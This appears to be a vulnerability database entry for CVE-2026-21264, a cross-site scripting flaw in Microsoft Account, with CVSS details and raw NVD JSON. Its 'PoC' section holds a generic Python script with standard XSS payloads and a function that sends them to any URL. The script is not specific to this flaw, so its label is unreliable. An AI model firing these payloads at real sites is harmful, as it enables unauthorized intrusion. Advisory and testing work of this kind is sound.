Security Vulnerability Report
中文
CVE-2026-21264 CVSS 9.3 CRITICAL

CVE-2026-21264

Published: 2026-01-22 23:15:57
Last Modified: 2026-02-03 12:58:31

Description

Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Account allows an unauthorized attacker to perform spoofing over a network.

CVSS Details

CVSS Score
9.3
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:microsoft:account:-:*:*:*:*:*:*:* - VULNERABLE
Microsoft Account Web Application (所有未修复版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import urllib.parse # CVE-2026-21264 XSS PoC (Educational Purpose Only) # This demonstrates how XSS payloads might be constructed # DO NOT use for unauthorized testing def generate_xss_payload(): """Generate basic XSS payloads for testing""" payloads = [ '<script>alert("XSS")</script>', 'javascript:alert(String.fromCharCode(88,83,83))', '<img src=x onerror=alert("XSS")>', '<svg/onload=alert("XSS")>' ] return payloads def test_xss_endpoint(url, payload): """Test XSS vulnerability (requires authorization)""" encoded_payload = urllib.parse.quote(payload) test_url = f"{url}?input={encoded_payload}" # Note: Only test systems you own or have permission to test response = requests.get(test_url, timeout=10) return response.text if __name__ == "__main__": print("CVE-2026-21264 XSS PoC - For authorized testing only") print("Reference: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21264")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21264", "sourceIdentifier": "[email protected]", "published": "2026-01-22T23:15:57.407", "lastModified": "2026-02-03T12:58:31.007", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["exclusively-hosted-service"]}], "descriptions": [{"lang": "en", "value": "Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Account allows an unauthorized attacker to perform spoofing over a network."}, {"lang": "es", "value": "Neutralización incorrecta de la entrada durante la generación de páginas web ('cross-site scripting') en Microsoft Account permite a un atacante no autorizado realizar suplantación de identidad a través de una red."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:account:-:*:*:*:*:*:*:*", "matchCriteriaId": "7CAFA2F9-C35B-4359-A38D-6AF611819033"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21264", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}